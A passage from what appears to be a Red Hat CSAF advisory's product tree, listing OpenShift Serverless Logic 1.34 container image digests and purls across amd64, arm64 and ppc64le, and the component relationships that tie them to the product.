"pkg:oci/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-management-console-rhel8&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", product: { name: "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", product_id: "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", product_identification_helper: { purl: "pkg:oci/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", product: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", product_id: "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", product_identification_helper: { purl: "pkg:oci/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", product: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", product_id: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", product_identification_helper: { purl: "pkg:oci/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", product: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", product_id: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", product_identification_helper: { purl: "pkg:oci/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d?arch=amd64&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8&tag=1.34.0-6", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", product: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", product_id: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", product_identification_helper: { purl: "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", product: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", product_id: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", product_identification_helper: { purl: "pkg:oci/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", product: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", product_id: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", product: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", product_id: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", product: { name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", product_id: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", product_identification_helper: { purl: "pkg:oci/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8&tag=1.34.0-2", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", product: { name: "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", product_id: "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", product_identification_helper: { purl: "pkg:oci/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", product: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", product_id: "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", product_identification_helper: { purl: "pkg:oci/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", product: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", product_id: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", product_identification_helper: { purl: "pkg:oci/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", product: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", product_id: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", product_identification_helper: { purl: "pkg:oci/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9?arch=arm64&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8&tag=1.34.0-6", }, }, }, ], category: "architecture", name: "arm64", }, { branches: [ { category: "product_version", name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", product: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", product_id: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", product: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", product_id: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", product: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", product_id: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", product: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", product_id: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", product: { name: "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", product_id: "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", product: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", product_id: "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator&tag=1.34.0-5", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", product: { name: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", product_id: "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8&tag=1.34.0-6", }, }, }, { category: "product_version", name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", product: { name: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", product_id: "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", product_identification_helper: { purl: "pkg:oci/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36?arch=ppc64le&repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8&tag=1.34.0-6", }, }, }, ], category: "architecture", name: "ppc64le", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", }, product_reference: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", }, product_reference: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", }, product_reference: "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", }, product_reference: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", }, product_reference: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", }, product_reference: "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", }, product_reference: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", }, product_reference: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", }, product_reference: "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", }, product_reference: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", }, product_reference: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", }, product_reference: "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", }, product_reference: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", }, product_reference: "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", }, product_reference: "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", }, product_reference: "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64 as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", }, product_reference: "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", }, product_reference: "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", relates_to_product_reference: "8Base-RHOSS-1.34", }, { category: "default_component_of", full_product_name: { name: "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le as a component of 8Base-Openshift-Serverless-1.34", product_id: "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", }, product_reference: 